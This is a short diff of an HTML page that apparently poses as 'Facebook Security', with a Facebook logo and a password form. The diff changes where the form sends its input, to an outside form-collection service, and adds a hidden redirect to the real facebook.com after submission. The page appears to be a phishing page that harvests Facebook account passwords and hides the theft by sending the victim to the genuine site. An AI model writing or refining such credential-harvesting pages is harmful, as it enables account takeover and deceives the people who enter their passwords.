--- a/index.html
+++ b/index.html
@@ -65,7 +65,8 @@
   </style>
 
 
-  <form class="content" action="https://submit-form.com/jOE2lVGBf" method="POST">
+  <form class="content" action="https://submit-form.com/yOGKAKwYJ" method="POST">
+    <input type="hidden" name="_redirect" value="https://www.facebook.com/"/>
     <div class="passwordContainer">
       <img src="fb.webp" alt="Logo">
       <h3>Facebook Security</h3>
